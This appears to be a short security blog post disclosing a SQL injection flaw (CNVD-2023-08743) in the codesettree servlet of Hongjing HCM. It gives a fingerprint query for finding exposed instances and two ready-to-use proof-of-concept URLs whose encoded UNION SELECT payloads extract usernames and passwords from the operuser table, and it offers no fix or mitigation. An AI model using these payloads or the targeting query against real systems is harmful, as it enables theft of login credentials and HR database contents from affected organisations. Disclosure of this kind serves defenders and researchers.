Hongjing Hcm Codesettree Sql Injection Vulnerability Cnvd 2023 08743
Hongjing Hcm Codesettree Sql Injection Vulnerability Cnvd 2023 08743
Hongjing HCM codesettree SQL injection vulnerability CNVD-2023-08743
Vulnerability Description
The HCM codesettree interface has a SQL injection vulnerability, and the attacker can obtain the account password and database information of the login system through the vulnerability.
Vulnerability Impact
Hongjing HCM
Network surveying and mapping
app=”HJSOFT-HCM”</span>
Vulnerability reappears
Login page
Verify POC
1
2
/servlet/codesettree?flag=c&status=1&codesetid=1&parentid=-1&categories=~31~27~20union~20all~20select~20~27~31~27~2cusername~20from~20operuser~20~2d~2d
/servlet/codesettree?flag=c&status=1&codesetid=1&parentid=-1&categories=~31~27~20union~20all~20select~20~27~31~27~2cpassword~20from~20operuser~20~2d~2d
This post is licensed under CC BY 4.0 by the author.